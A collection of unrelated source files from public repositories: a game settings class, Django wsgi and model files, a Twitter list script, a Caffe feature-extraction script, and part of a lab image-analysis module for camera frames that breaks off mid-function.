a5e3a44b8d8c91cfa90e5ee8271bd1d34fba668b | f479e33c9e591f2de3855d2aa58815ffd1ca2756 | /Alien/setting.py | 67ba8cc56dc187953756d8ee622da5a2d4820d8b | [] | no_license | cathip/mixed | 2f8ab69d2268ba9fd38ed3e2c25d7bfea4cbe881 | 66fb3be4fe208c3c66dabfd3352c0dc348eaef52 | refs/heads/master | 2022-12-02T08:10:17.108904 | 2020-07-23T13:16:25 | 2020-07-23T13:16:25 | 281,955,265 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | class Setting():
    def __init__(self):
        """Store all tunable game settings for the Alien Invasion game."""
        # Screen settings
        self.screen_width = 1200
        self.screen_height = 800
        self.bg_color = (230, 230, 230)
        # Ship settings
        self.ship_speed_factor = 1.5
        self.ship_limit = 3
        # Bullet settings
        self.bullet_speed_factor = 3
        self.bullet_width = 10
        self.bullet_height = 30
        self.bullet_color = 245, 192, 10
        self.bullet_allowed = 30
        # Alien settings
        self.alien_speed_factor = 1
        self.fleet_drop_speed = 50
        # fleet_direction: 1 means move right, -1 means move left
self.fleet_direction = 1 | [
"862485926@qq.com"
] | 862485926@qq.com |
dbddebd411deb095d4dc5db535becd6c81fe2c76 | ae69970610b5a3c253a8fd7e595ef67c31ba3c36 | /Scouter/wsgi.py | 821fdd7d61afd5534a16039dc85ae4955c586147 | [
"MIT"
] | permissive | DevrathIyer/FRCScouter2017-2018 | 40bf00c69746e2368ef980ace4eb32c7e55d94ee | 64c76b570d4b9bf82ed00f8d7cd6865e383b26d6 | refs/heads/master | 2021-01-11T13:57:07.168053 | 2017-06-20T16:30:00 | 2017-06-20T16:30:00 | 94,910,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | """
WSGI config for Scouter project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before the application is built.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Scouter.settings")
application = get_wsgi_application()
| [
"idevrath@gmail.com"
] | idevrath@gmail.com |
0b1088393f030a8a3fffe2f5092bad8231fac47c | a8e90365bb80918d1b03a0269aff9fb69d52d250 | /9.Function-Lambda.py | a8537b6999bb2e9d2f706c4fd92bbb976e7a21f7 | [] | no_license | sanghoon96/learn_python | af929ddec3d22a4c8c70a5d0bbde79763e0ab314 | 1bc43cbf9f365120a8d44c677514d2b63974b471 | refs/heads/master | 2023-02-04T20:32:29.773049 | 2020-12-07T23:35:37 | 2020-12-07T23:35:37 | 318,410,736 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | sum = lambda arg1, arg2 : arg1 + arg2;
print("Value of total : ", sum( 10, 20 ))
nums = [1,2,3]
def is_greater_than_one(x):
    """Predicate: True when *x* is strictly greater than 1."""
    return 1 < x
more_than_nums = filter(is_greater_than_one, nums)
print(list(more_than_nums))
more_than_nums = filter(lambda x : x > 1, nums)
print(list(more_than_nums)) | [
"sanghoon96@naver.com"
] | sanghoon96@naver.com |
d77736ddb7296765054ab14e0be64df5ce79366e | 844ba7f7cde8730255487a0063535dfc81343715 | /pharmacyProject/wsgi.py | 5e528e121836ab30b941f09c888206e79ba22ad0 | [] | no_license | pharmacyProjectInDjango/pharmacyProject | 60ddebc3be2ee02c3ce806a2c31c4af8e09c551c | c087c6f52f8f37b9fa522d69a8bce26a51284154 | refs/heads/master | 2023-06-03T11:57:12.897145 | 2021-06-10T18:18:13 | 2021-06-10T18:18:13 | 375,784,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | """
WSGI config for pharmacyProject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before the application is built.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pharmacyProject.settings')
application = get_wsgi_application()
| [
"almazikay@gmail.com"
] | almazikay@gmail.com |
74b0a2c23703cb4e5ab03f2b4f26df4d4bbbd55f | c705b2620119df0d60e925e55228bfbb5de3f568 | /archives/twitter/add_to_list.py | b07b820c711aef611ff33b5d19f9e517e8424b05 | [
"Apache-2.0"
] | permissive | mcxiaoke/python-labs | 5aa63ce90de5da56d59ca2954f6b3aeae7833559 | 61c0a1f91008ba82fc2f5a5deb19e60aec9df960 | refs/heads/master | 2021-08-05T03:47:51.844979 | 2021-07-24T11:06:13 | 2021-07-24T11:06:13 | 21,690,171 | 7 | 7 | Apache-2.0 | 2020-08-07T01:52:32 | 2014-07-10T10:20:17 | Python | UTF-8 | Python | false | false | 1,023 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: mcxiaoke
# @Date: 2016-01-04 14:39:15
from __future__ import print_function, unicode_literals
import os
import sys
import codecs
import requests
import tweepy
from config import OWNER, OWNER_ID, CONSUMER_KEY, CONSUMER_SECRET, ACCESSS_TOKEN_KEY, ACCESS_TOKEN_SECRET
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESSS_TOKEN_KEY, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
def read_list(name):
    """Read a UTF-8 text file into a list of lines.

    Trailing newlines are removed. Returns None when *name* is not an
    existing regular file.
    """
    if not os.path.isfile(name):
        return None
    with codecs.open(name, 'r', 'utf-8') as handle:
        lines = []
        for raw in handle:
            lines.append(raw.rstrip('\n'))
        return lines
def add_to_list(slug, screen_name):
    """Add the Twitter user *screen_name* to the owner's list *slug*."""
    print('add user: %s to list: %s' % (screen_name, slug))
    api.add_list_member(slug=slug,
                        screen_name=screen_name,
                        owner_screen_name='dorauimi')
def main():
    """Add every screen name listed in the file given as argv[1] to the
    'asiangirls' list."""
    uids = read_list(sys.argv[1])
    # NOTE(review): read_list returns None for a missing file, which would
    # raise a TypeError here -- confirm the input file always exists.
    for uid in uids:
        add_to_list('asiangirls', uid)
if __name__ == '__main__':
main()
| [
"mcxiaoke@gmail.com"
] | mcxiaoke@gmail.com |
ee93c3fd7fdf2625001431b69199e534a918d3fc | f586ce9f6a91ea1b42449325be38596b891fa503 | /song.py | 9d37e2bb2db9e30ad05c840b76ee5029b95d3874 | [] | no_license | LukeEsworthy/Setlist-Tracker | 00976041250f83facd383b6cc7e4cc39fb0b64ef | 6fa7da5a788d90e7bdc3ad342f93fff8c9efa5f6 | refs/heads/master | 2022-12-13T03:23:27.230780 | 2020-09-14T20:46:41 | 2020-09-14T20:46:41 | 294,788,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | from django.db import models
class Song(models.Model):
    # A single song: title, artist and a length stored as an integer
    # (presumably seconds -- TODO confirm the unit against callers).
    title = models.CharField(max_length=75)
    artist = models.CharField(max_length=75)
    song_length = models.IntegerField()
    def __str__(self):
        # Human-readable form shown in the Django admin and shells.
        return f'{self.title} by {self.artist}'
| [
"lukesworthy@gmail.com"
] | lukesworthy@gmail.com |
aba0382b93e31c197307a735fec8fa49db618b0e | 7a4be09397ebb9cd5329675adf687ff845c0404a | /code/caffe/gen_feature.py | 757eb7507e6c5656d69f3a37d66f931816f92d5f | [
"MIT"
] | permissive | zhaokv/Deep-Style-Match | 79cbe4be8b030fb03af6fb4253c76090e1cc8da6 | ea44c9dcde387fd280be1a05341dc63e7df23644 | refs/heads/master | 2021-05-19T09:28:53.456879 | 2020-03-31T14:40:03 | 2020-03-31T14:40:03 | 251,630,415 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | import sys
caffeRoot = '/home/zhaokui/code/caffe/'
sys.path.insert(0, caffeRoot+'python')
import caffe
import numpy as np
import cPickle as pickle
import copy
from sklearn.metrics.pairwise import euclidean_distances as ed
from sklearn.metrics import roc_auc_score as auc
from tqdm import *
# Directory holding the trained siamese GoogLeNet model files.
modelDir = '/home/zhaokui/research/KDD/code/caffe/siamese_googlenet/'
caffe.set_mode_gpu()
# Classifier(prototxt, weights, image_dims, mean, input_scale, crop size,
#            channel swap) -- (2,1,0) reorders RGB to BGR for Caffe.
net = caffe.Classifier(modelDir+'deploy1.prototxt',
                       modelDir+'googlenet_iter_60000.caffemodel',
                       (256, 256),
                       np.load('item_mean.npy').mean(1).mean(1),
                       None,
                       224,
                       (2,1,0))
itemDir = '/home/zhaokui/research/KDD/data/taobao/'
itemData = open(itemDir+'pro_test_item.txt').readlines()
# Extract the 'loss3f' feature vector of every test item image,
# keyed by the image's base name.
featureDic = {}
for item in tqdm(itemData):
    name = item.split('/')[1].split('.')[0]
    image = caffe.io.load_image(itemDir+item.split()[0])
    net.predict([image], False)
    featureDic[name] = copy.deepcopy(net.blobs['loss3f'].data[0])
y = []
pred_y = []
dataDir = '/home/zhaokui/research/KDD/data/taobao/'
testData = open(dataDir+'pro_test_set.txt').readlines()
# Score each labeled test pair by the Euclidean distance between
# the two item feature vectors.
for line in tqdm(testData):
    tmp = line.split()
    itemA = tmp[0].split('/')[1].split('.')[0]
    itemB = tmp[1].split('/')[1].split('.')[0]
    y.append(int(tmp[2]))
    pred_y.append(ed(np.array(featureDic[itemA]).reshape(1,-1),
                     np.array(featureDic[itemB]).reshape(1, -1))[0][0])
# Persist the scores and features, then report AUC of distance vs. label.
with open('predict.dat', 'w') as f:
    pickle.dump((y, pred_y), f)
with open('item_feature.dat', 'w') as f:
    pickle.dump(featureDic, f)
print(auc(y, pred_y))
| [
"zhaokui@zju.edu.cn"
] | zhaokui@zju.edu.cn |
7cc84142786ae723ed0b34d062969d89df876df0 | a9d482fea671e1a8bede36978ea2cf6406bf519c | /apps/accounts/views.py | 0bd42648f3c0f567a2881f74004045c7c517e7c4 | [] | no_license | aigora-de/aigora-web-old | 5d1873e26292419b6c7537e059d454a0f335308b | 6c2b3ba98337bb540992afe2b936edd717b8900c | refs/heads/master | 2020-06-19T21:41:52.730050 | 2019-07-17T06:23:26 | 2019-07-17T06:23:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | from django.contrib.auth.forms import UserCreationForm
from django.urls import reverse_lazy
from django.views import generic
# Create your views here.
class SignUp(generic.CreateView):
    # Registration view: renders Django's stock UserCreationForm and
    # redirects to the login page after a successful sign-up.
    form_class = UserCreationForm
    success_url = reverse_lazy('login')
    template_name = 'signup.html'
| [
"40235800+See2-io@users.noreply.github.com"
] | 40235800+See2-io@users.noreply.github.com |
6170065e53c3bee0a39dd471835021b9a8d4e23e | 0c9236c0ac3fb3b1a681bbdf50836a9d94f750a7 | /im_analysis.py | d2963fb363263134ccf460438aa67f6644b1482b | [] | no_license | chchamb/EXOscripts | 536d823e06ce73015b411a483560d9baece2b660 | dad1aad4321c55cfdc5564408b510dd159f914ae | refs/heads/master | 2021-01-01T16:59:32.191646 | 2017-07-21T17:29:13 | 2017-07-21T17:29:13 | 97,971,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69,733 | py | # Script for handling image analysis
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
import gen_reader as gr
import lv_analysis as lv
import scope_cal as scp
import funk
import math as m
# Define global variable for date and darkfile
date=20170720
# Lookup tables mapping a run date to its dark-frame and null-pulse files.
darkfiles=gr.reader('/home/chris/anaconda/EXOscripts/darkframes.txt',header=False,dtype=int)
nullpulses=gr.reader('/home/chris/anaconda/EXOscripts/nullpulses.txt',header=False,dtype=int)
# Dark-frame file number registered for this date.
darkfile=int(darkfiles[np.where(darkfiles==date)[0],1])
# Not every date has a null-pulse entry, so guard the lookup.
if date in nullpulses[:,0]:
    null_pulse=int(nullpulses[np.where(nullpulses==date)[0],1])
#=========================================================================================
# Function to remove cosmic rays from images
def im_remove_cosmics_old(filenum,tag,output):
    """Read a raw ascii image run and suppress cosmic-ray hits.

    A pixel is flagged as a cosmic when it exceeds 3x the mean of its
    surrounding 5x5 neighborhood (center pixel excluded); the flagged pixel
    and its two horizontal neighbors are replaced by the neighborhood
    minimum.  A 3-pixel border is skipped so the window always fits.

    Parameters:
        filenum -- integer run number appended to the experiment prefix
        tag     -- unused label, kept for call-site compatibility
        output  -- if True, print a note for each frame that had cosmics

    Returns:
        x, y          -- pixel index axes (x 0-based array, y 1-based range)
        pix_cf        -- cleaned (N, y_max, x_max) array
        x_max, y_max, N -- image dimensions and frame count
        run           -- run name parsed from the data filename
    """
    import numpy as np
    import os
    # Build the path from the experiment prefix of the ascii directory
    expnum=os.listdir('/home/chris/anaconda/data/'+str(date)+'/raw/ascii')[1][:7]
    filename='/home/chris/anaconda/data/'+str(date)+'/raw/ascii/'+expnum+str(filenum)+'.txt'
    # Run name: characters between the final '/' and the first '.'
    run=os.path.basename(filename).split('.')[0]
    # Read the whitespace-separated columns: x, y-count, frame-count, counts
    column1,column4=[],[]
    with open(filename,'r') as datafile:  # context manager: no leaked handle
        for line in datafile:
            values=line.strip().split()
            column1.append(float(values[0]))
            column4.append(float(values[3]))
            # y_max and N keep the values of the last line read
            y_max=int(values[1])
            N=int(values[2])
    # Get the number of x and y points and the arrays for each
    x_max=int(len(column1)/(N*y_max))
    x=np.array(range(x_max))
    y=range(1,y_max+1)
    # The flat pixel list is stored row-major as (frame, y, x)
    pix_raw=np.reshape(np.array(column4),(N,y_max,x_max))
    # Copy array for removal of cosmics
    pix_cf=pix_raw.copy()
    # Remove cosmic rays
    for k in range(N):
        reps=0
        for j in range(3,y_max-3):
            for i in range(3,x_max-3):
                window=np.ndarray.flatten(pix_raw[k,j-2:j+3,i-2:i+3])
                # Exclude the center pixel (flat index 12 of the 5x5
                # window) from the neighborhood average.  The original code
                # deleted index 7 (the pixel above center), which left the
                # candidate cosmic inside its own comparison baseline.
                window=np.delete(window,12)
                window_ave=np.mean(window)
                if pix_raw[k,j,i]>=(3*window_ave):
                    rep_vals=np.concatenate([window,[window_ave]])
                    # Replace the hit and its horizontal neighbors with the
                    # neighborhood minimum
                    pix_cf[k,j,i-1:i+2]=np.amin(rep_vals)
                    reps=reps+1
        if reps>0 and output==True:
            print('Cosmics removed from frame %d'%(k+1))
    return x,y,pix_cf,x_max,y_max,N,run
#-----------------------------------------------------------------------------------------
# Create dark frame average:
if darkfile!=0:
    # Mean over all frames of the (cosmic-cleaned) dark run: the default
    # dark frame subtracted by im_sub_dark.
    dark_pix_g=np.mean(im_remove_cosmics_old(darkfile,'bg',False)[2],axis=0)
    #print(np.mean(dark_pix_g))
    print('dark run: '+str(darkfile))
if darkfile==0:
    # No dark run for this date: subtracting the scalar 0. is a no-op.
    dark_pix_g=0.
#------------------------------------------------------------------------------------------
# Function to import data from ascii files
def im_import(filenum,tag,output):
    """Load a raw ascii image run into a (frame, y, x) pixel array.

    The data file holds four space-separated columns: x, y, frame, counts.
    ``tag`` and ``output`` are unused but kept for call-site compatibility.

    Returns x and y pixel axes, the pixel array, the image dimensions
    (x_max, y_max), the frame count N, and the run name parsed from the
    data filename.
    """
    import numpy as np
    import os
    import pandas as pd
    # Locate the data file through the experiment prefix of the directory
    prefix=os.listdir('/home/chris/anaconda/data/'+str(date)+'/raw/ascii')[1][:7]
    filename='/home/chris/anaconda/data/'+str(date)+'/raw/ascii/'+prefix+str(filenum)+'.txt'
    # Run name: the text between the final '/' and the first '.'
    run=os.path.basename(filename).split('.')[0]
    # Parse the four columns with pandas
    dat=pd.read_csv(filename,header=None,sep=' ',names=['x','y','f','px'])
    # Image dimensions: y and frame counts are column maxima, x follows
    y_max=int(np.amax(dat.y))
    N=int(np.amax(dat.f))
    x_max=int(len(dat.px)/(y_max*N))
    x=np.arange(x_max)
    y=np.arange(y_max)
    # Pixel values are stored row-major as (frame, y, x)
    pix=np.reshape(dat.px,(N,y_max,x_max))
    return x,y,pix,x_max,y_max,N,run
#-----------------------------------------------------------------------------------------
# Function to background subtract images
def im_sub(sigfile,bgfile,**kwargs):
    """Subtract a background run from a signal run.

    Keyword arguments:
        bg_scale -- multiplier applied to the background before subtracting
        bg_shift -- [dx, dy] pixel shift applied to the background
        bg_frame -- 'ave' (mean of all bg frames), 'each' (frame-by-frame),
                    or an integer 1-based background frame number
        frames   -- 'all' or a sequence of signal frame indices to keep

    Returns the same tuple as im_sub_dark, with the subtracted pixel stack.
    """
    # Define keyword arguments
    scale=kwargs.get('bg_scale',1.)
    shift=kwargs.get('bg_shift',[0,0])
    frame=kwargs.get('bg_frame','ave')
    sigframe=kwargs.get('frames','all')
    import numpy as np
    import utility as ut
    # im_sub_dark requires the readout-speed argument; the original call
    # omitted it and raised TypeError
    sig_x,sig_y,sig_pix,sig_x_max,sig_y_max,sig_N,sig_run=im_sub_dark(sigfile,'slow')
    bg_x,bg_y,bg_pix,bg_x_max,bg_y_max,bg_N,bg_run=im_sub_dark(bgfile,'slow')
    if sigframe!='all':
        sig_pix=sig_pix[sigframe,:,:]
        sig_N=len(sigframe)
    if frame=='ave':
        # Average the background frames together
        bg_pix=np.mean(bg_pix,axis=0)
    elif frame=='each':
        # Keep the full stack: bg frame i is subtracted from sig frame i
        pass
    else:
        # A single 1-based background frame.  (The original if/else chain
        # fell through to this indexing even for 'ave' and crashed.)
        bg_pix=bg_pix[frame-1,:,:]
    # Shift if necessary
    bg_final=ut.shifter(bg_pix,shift[0],shift[1])
    # Do the subtraction
    pix_sub=sig_pix-(scale*bg_final)
    return sig_x,sig_y,pix_sub,sig_x_max,sig_y_max,sig_N,sig_run
#-----------------------------------------------------------------------------------------
# Function to background subtract images
def im_sub_dark(sigfile,speed,**kwargs):
    """Load a run with im_import and subtract a dark frame.

    Parameters:
        sigfile -- integer run number of the signal data
        speed   -- 'slow' (dark subtraction enabled) or 'fast' (first two
                   pixel columns dropped, no dark subtraction)
        dark    -- keyword: False (default) subtracts the module-level dark
                   average dark_pix_g; 0 disables subtraction; any other
                   integer selects that run as a manual dark frame

    Returns x, y, the subtracted pixel stack, the image dimensions, frame
    count and run name, as produced by im_import.

    NOTE: the original implementation compared ``dark`` with ``==``, so the
    default ``dark=False`` also matched ``dark==0`` (False==0 is True) and
    the global dark frame was silently never subtracted.  Identity checks
    (``is False``) restore the intended behavior.
    """
    dark=kwargs.get('dark',False)
    import numpy as np
    # Load the raw frames
    sig_x,sig_y,sig_pix,sig_x_max,sig_y_max,sig_N,sig_run=im_import(sigfile,'signal',False)
    if speed=='fast':
        # Fast readout: drop the first two columns, no dark subtraction
        sig_pix=sig_pix[:,:,2:]
        dark_pix=np.zeros(np.shape(sig_pix))
    elif dark is False:
        # Default: the dark-run average built at module import for this date
        dark_pix=dark_pix_g
    elif dark==0:
        # Explicitly disabled: subtract zeros (a no-op)
        dark_pix=np.zeros(np.shape(sig_pix))
    else:
        # Manual dark run: average its cosmic-cleaned frames
        dark_pix=np.mean(im_remove_cosmics_old(dark,'background',False)[2],axis=0)
        print('manual dark frame: '+str(dark))
    # dark_pix is 2-D (or a scalar) and broadcasts over the frame axis
    pix_sub=sig_pix-dark_pix
    return sig_x,sig_y,pix_sub,sig_x_max,sig_y_max,sig_N,sig_run
#-----------------------------------------------------------------------------------------
# Function to plot 0th order images
def implot_0(filename,**kwargs):
    """Display (and optionally save) 0th-order image frames for a run.

    ``filename`` is the integer run number.  Keyword arguments select the
    colormap, frame list, background run, axis/color limits, laser-power
    normalization ('lv'), readout speed, a flat scale factor and the dark
    handling; 'store' returns the pixel stack.
    """
    # Define keyword arguments
    colmap=kwargs.get('cmap','jet')
    frames=kwargs.get('frames','all')
    bgfile=kwargs.get('bgfile',False)
    store=kwargs.get('store',False)
    savepath=kwargs.get('savepath',False)
    xylim=kwargs.get('axis','default')
    zscale=kwargs.get('z_scale','default')
    tag=kwargs.get('tag','')
    bgscale=kwargs.get('bg_scale',1.)
    shift=kwargs.get('bg_shift',[0,0])
    bgframe=kwargs.get('bg_frame','ave')
    overlay=kwargs.get('overlay',False)
    rect=kwargs.get('rect','none')
    lvscale=kwargs.get('lv',False)
    speed=kwargs.get('speed','slow')
    scale=kwargs.get('scale',1.)
    dark=kwargs.get('dark',False)
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    import os
    import utility as ut
    import lv_analysis as lv
    if bgfile==False:
        # Import data and remove cosmics with image_remove_cosmics
        x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,speed,dark=dark)
    else:
        # Import data and remove cosmics with image_sub
        if frames!='all':
            # im_sub expects 0-based frame indices
            frames=np.array(frames)-1
        x,y,pix,x_max,y_max,N,run=im_sub(filename,bgfile,bg_scale=bgscale,bg_shift=shift,bg_frame=bgframe,frames=frames)
    if frames=='all':
        frames=range(1,N+1)
    # Scale, if neccesary
    pix=pix*scale
    if lvscale!=False:
        # Per-frame laser energies in mW; 'lv' names the LabView log run
        pows=lv.lv_energy(lvscale)*1000
        # NOTE(review): (N,y,x)/(N,) broadcasts against the LAST axis --
        # confirm this division behaves as intended for multi-frame runs
        pix=pix/pows
    # Plot the frames desired ('none' skips plotting entirely)
    if frames != 'none':
        for frame in frames:
            if overlay==False:
                # A new figure per frame, named after the run
                plt.figure(run)
            if overlay==True:
                # Reuse a single figure, clearing it each time
                plt.figure('im_plot')
                plt.clf()
            im=plt.imshow(pix[(frame-1),:,:],cmap=colmap,interpolation='nearest')
            plt.colorbar(im,orientation='vertical')
            plt.title(run+': frame '+repr(frame))
            plt.xlabel('x Pixel')
            plt.ylabel('y Pixel')
            # want to start at beginning of first lim, and end of last lim
            # NOTE(review): x[-1]-.5 clips the last half pixel (the sibling
            # functions use x[-1]+.5) -- confirm intended
            plt.axis([x[0]-.5,x[-1]-.5,y[0]-.5,y[-1]-.5])
            if xylim!='default':
                plt.axis(xylim)
            if zscale!='default':
                plt.clim(zscale)
            if rect!='none':
                ut.rect(rect)
            plt.show()
            if savepath!=False:
                ut.create_dir(savepath)
                # Zero-pad the frame number to three digits
                if frame<=9:
                    framestr='00'+str(frame)
                if 10<=frame<=99:
                    framestr='0'+str(frame)
                if 100<=frame:
                    framestr=str(frame)
                plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_'+framestr+tag+'.png')
    # Return data if desired
    if store==True:
        return pix
#-----------------------------------------------------------------------------------------
# Function to plot 0th order images
def im_read(filename,**kwargs):
    """Load a run (dark- or background-subtracted) and return the pixel
    stack, optionally normalized frame-by-frame by the laser power.

    Keyword arguments mirror im_sub / im_sub_dark; 'lv' names a LabView
    power log used for normalization (mW), 'scale' is a flat multiplier
    applied to every pixel, and 'T_R' is the transmission factor forwarded
    to lv_pow.
    """
    # Define keyword arguments
    bgfile=kwargs.get('bgfile',False)
    bgscale=kwargs.get('bg_scale',1.)
    shift=kwargs.get('bg_shift',[0,0])
    bgframe=kwargs.get('bg_frame','ave')
    lvscale=kwargs.get('lv',False)
    speed=kwargs.get('speed','slow')
    scale=kwargs.get('scale',1.)
    dark=kwargs.get('dark',False)
    T_R=kwargs.get('T_R',1.)
    # Import modules
    import numpy as np
    import lv_analysis as lv
    if bgfile==False:
        # Dark-subtracted import
        x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,speed,dark=dark)
    else:
        # Background-subtracted import of all frames.  (The original branch
        # tested an undefined 'frames' variable here and raised NameError.)
        x,y,pix,x_max,y_max,N,run=im_sub(filename,bgfile,bg_scale=bgscale,bg_shift=shift,bg_frame=bgframe,frames='all')
    # Scale, if neccesary
    pix=pix*scale
    if lvscale!=False:
        # Normalize each frame by its laser power in mW
        pows=lv.lv_pow(lvscale,T_R=T_R)*1000
        for i in range(len(pows)):
            pix[i,:,:]=pix[i,:,:]/pows[i]
    return pix
#-----------------------------------------------------------------------------------------
# Function to integrate area in 0-order image (can do fractional pixels)
def im_int(filename,bounds,**kwargs):
    """Integrate a rectangular region of each frame and plot the result.

    ``bounds`` is [left, right, top, bottom] pixel edges when
    boundtype='edge', or [xcenter, ycenter, width, height] when
    boundtype='center'.  Fractional edge pixels are weighted by the area
    they cover.  Optional normalization: 'lv' (laser energy, per-frame or
    run average via 'pow'), 'timescale' (exposure time) and 'normalize'
    (region area).  Returns the per-frame integral array when store=True.
    """
    # Define keyword arguments
    colmap=kwargs.get('cmap','jet')
    frames=kwargs.get('frames','all')
    bgfile=kwargs.get('bgfile',False)
    plt_rect=kwargs.get('plt_rect',True)
    savepath=kwargs.get('savepath',False)
    store=kwargs.get('store',True)
    overlay=kwargs.get('overlay',False)
    lab=kwargs.get('label','default')
    scale=kwargs.get('bg_scale',1.)
    shift=kwargs.get('bg_shift',[0,0])
    bgframe=kwargs.get('bg_frame','ave')
    xylim=kwargs.get('axis','default')
    zscale=kwargs.get('z_scale','default')
    submin=kwargs.get('sub_min',False)
    dt=kwargs.get('frametime',False)
    lvscale=kwargs.get('lv',False)
    timescale=kwargs.get('timescale',False)
    T_R=kwargs.get('T_R',1.)
    bndtype=kwargs.get('boundtype','edge')
    norm=kwargs.get('normalize',False)
    dark=kwargs.get('dark',False)
    powscale=kwargs.get('pow','frame')
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as ut
    import lv_analysis as lv
    if frames!='all':
        frames=np.array(frames)
    if bgfile==False:
        # Import data and remove cosmics (dark-subtracted)
        x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,'slow',dark=dark)
    else:
        # Import data and background-subtract with im_sub
        x,y,pix,x_max,y_max,N,run=im_sub(filename,bgfile,bg_scale=scale,bg_shift=shift,bg_frame=bgframe,frames=frames)
    if frames=='all':
        frames=np.arange(N)+1
    scaled=''
    if lvscale!=False:
        # Normalize by laser energy, either the run average or per frame
        pows=lv.lv_energy(lvscale,T_R=T_R)
        if powscale=='ave':
            pix=pix/(1000*np.mean(pows))
        if powscale=='frame':
            for i in range(len(pows)):
                pix[i,:,:]=pix[i,:,:]/(1000*pows[i])
        scaled=' per mW'
    if timescale==True:
        times=lv.get_avtime(lvscale)
        pix=pix/(times*1E-3)
        scaled=' per mW*s'
    # Region edges [l, r, t, b] and total (possibly fractional) pixel area
    if bndtype=='edge':
        [l,r]=np.array(bounds[:2])
        [t,b]=np.array(bounds[-2:])
        intsize=(bounds[1]-bounds[0])*(bounds[3]-bounds[2])
    if bndtype=='center':
        [l,r]=np.array([bounds[0]-(bounds[2]/2.),bounds[0]+(bounds[2]/2.)])
        [t,b]=np.array([bounds[1]-(bounds[3]/2.),bounds[1]+(bounds[3]/2.)])
        intsize=bounds[2]*bounds[3]
    # Fractional coverage of the four edge strips
    lf=np.ceil(l)-l
    rf=r-np.floor(r)
    tf=np.ceil(t)-t
    bf=b-np.floor(b)
    integral=[]
    for j in frames:
        i=j-1
        # Whole pixels fully inside the region, plus weighted edge strips
        # and corners
        fullpix=np.sum(pix[i,m.ceil(t):m.floor(b),m.ceil(l):m.floor(r)])
        sidepixl=lf*np.sum(pix[i,m.ceil(t):m.floor(b),m.floor(l)])
        sidepixr=rf*np.sum(pix[i,m.ceil(t):m.floor(b),m.floor(r)])
        sidepixt=tf*np.sum(pix[i,m.floor(t),m.ceil(l):m.floor(r)])
        sidepixb=bf*np.sum(pix[i,m.floor(b),m.ceil(l):m.floor(r)])
        cornerbl=bf*lf*pix[i,m.floor(b),m.floor(l)]
        cornertl=tf*lf*pix[i,m.floor(t),m.floor(l)]
        cornertr=tf*rf*pix[i,m.floor(t),m.floor(r)]
        # Bottom-right corner is weighted by its own fractions bf*rf (the
        # original reused the top-left weights tf*lf here)
        cornerbr=bf*rf*pix[i,m.floor(b),m.floor(r)]
        integral.append(fullpix+sidepixl+sidepixr+sidepixt+sidepixb+cornerbl+cornertl+cornerbr+cornertr)
    integral=np.array(integral,dtype=float)
    if norm==True:
        integral=integral/float(intsize)
    # Plot the frames desired
    if plt_rect==True:
        for frame in frames:
            plt.figure('int_area')
            plt.clf()
            im=plt.imshow(pix[(frame-1),:,:],cmap=colmap,interpolation='nearest')
            plt.colorbar(im,orientation='vertical')
            plt.title(run+': frame '+repr(frame))
            plt.xlabel('x Pixel')
            plt.ylabel('y Pixel')
            # want to start at beginning of first bound, and end of last bound
            plt.axis([x[0]-.5,x[-1]+.5,y[0]-.5,y[-1]+.5])
            ut.rect([l,r,t,b])
            # put pixel number at far pixel edge, instead of middle
            plt.xticks(np.arange(np.shape(pix)[2]),np.arange(np.shape(pix)[2])+1)
            plt.yticks(np.arange(np.shape(pix)[1]),np.arange(np.shape(pix)[1])+1)
            if xylim!='default':
                plt.axis(xylim)
            if zscale!='default':
                plt.clim(zscale)
            plt.show()
            # Zero-pad the frame number to three digits
            if frame<=9:
                framestr='00'+str(frame)
            if 10<=frame<=99:
                framestr='0'+str(frame)
            if 100<=frame:
                framestr=str(frame)
            if savepath!=False:
                ut.create_dir(savepath)
                plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_'+framestr+'_int_area.png')
    # Plot integral
    if submin==True:
        integral=integral-np.amin(integral)
    if lab=='default':
        lab=run
    if overlay==False:
        plt.figure(run+'_int')
    if overlay==True:
        plt.figure('int')
        plt.clf()
    ax=plt.gca()
    if dt==False:
        plt.plot(frames,integral,'-o',label=lab)
        plt.axis([0,N+1,0,1.1*np.amax(integral)])
        plt.xlabel('Frame')
        xdata=frames
    if dt!=False:
        time=np.arange(dt,(np.shape(integral)[0]+1)*dt,dt)
        plt.plot(time,integral,'-o',label=lab)
        plt.axis([0,time[-1]+dt,0,1.1*np.amax(integral)])
        plt.xlabel('Time (s)')
        xdata=time
    plt.ylabel('Integrated Counts'+scaled)
    plt.title(run+' Integral')
    bbox_props = dict(boxstyle='square', fc='.9', ec='k', alpha=1.0)
    # Count whole pixels inside the region with integer slices (the
    # original sliced with the raw bounds and raised TypeError when they
    # were fractional, e.g. for boundtype='center')
